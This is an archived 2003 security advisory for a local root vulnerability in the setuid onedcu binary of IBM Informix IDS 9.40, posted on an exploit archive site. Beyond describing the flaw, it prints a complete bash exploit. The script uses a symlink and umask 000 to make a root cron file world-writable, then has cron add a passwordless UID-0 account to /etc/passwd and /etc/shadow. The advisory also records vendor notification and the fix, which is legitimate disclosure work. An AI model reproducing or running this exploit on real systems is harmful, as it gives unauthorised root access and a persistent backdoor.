what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

open3sIDSonedcu.txt

open3sIDSonedcu.txt
Posted Jan 29, 2004
Authored by Juan Manuel Pascual Escriba | Site open3s.com

A local vulnerability exists in the IBM Informix IDSv9.40 onedcu binary that allows local users to overwrite any root owned file.

tags | exploit, local, root
SHA-256 | db72f511fe4d56d0ece80a8d419ef2589c072cffdbf4185599095797b18a579e

open3sIDSonedcu.txt

Change Mirror Download


----------========== OPEN3S-2003-08-08-eng-informix-onedcu ==========----------

Title: Local Vulnerability in IBM Informix IDSv9.40 onedcu binary
Date: 08-08-2003
Platform: Only tested in Linux but can be exported to others.
Impact: Users with exec perm over ./bin/onedcu can create files
with 666 mode and owned by root.
Author: Juan Manuel Pascual Escriba <pask@open3s.com>
Status: Solved by IBM Corp.


PROBLEM SUMMARY:

There is a write permisions checking error in onedcu binary that can be used by local
users with exec perm over onedcu to write any file owned by root with mode 666.


DESCRIPTION

onedcu is installed with 6755 perm and owned by root.informix in my default installation

[informix@dimoni onedcu]$ ls -alc /home/informix-9.40/bin/onedcu
-rwsr-sr-x 1 root informix 1066468 Aug 8 23:39 /home/informix-9.40/bin/onedcu


The binary does'nt drop privileges before writing the log and writes \001 file owned by root:


IMPACT:

Easy to overwrite or create new files owned by root (.rhosts, cron files) via link
injection.

EXPLOIT

#!/bin/bash

ONEDCU=/home/informix-9.40/bin/onedcu
CRONFILE=/etc/cron.hourly/pakito
USER=pakito
DIR=./trash

export INFORMIXDIR=/home/informix-9.40/
export ONCONFIG=onconfig.std

if [ -d $DIR ]; then
echo Trash directory already created
else
mkdir $DIR
fi

cd $DIR
if [ -f ./"\001" ]; then
echo Link Already Created
else
ln -s $CRONFILE `echo -e "\001"`
fi

umask 000
$ONEDCU &
kill -9 `pidof $ONEDCU`


echo "echo "#!/bin/bash"" > $CRONFILE
echo "echo "$USER:x:0:0::/:/bin/bash" >> /etc/passwd" >> $CRONFILE
echo "echo "$USER::12032:0:99999:7:::" >> /etc/shadow" >> $CRONFILE
echo " "
echo " This vulnerability was researched by Juan Manuel Pascual Escriba"
echo " 08/08/2003 Barcelona - Spain pask@open3s.com
echo " "
echo " must wait until cron execute $CRONFILE and then exec su pakito"



STATUS

Reported to IBM security team at 11th of August 2003

See more infomartion about this vulnerability and workaround at:
https://www-1.ibm.com/support/docview.wss?uid=swg21153336

This vulnerability was managed in an efficient manner by Jonathan Leffler
from IBM Informix Database Engineering Team.


--------------------------------------------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba pask@open3s.com
Barcelona - Spain https://www.open3s.com
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close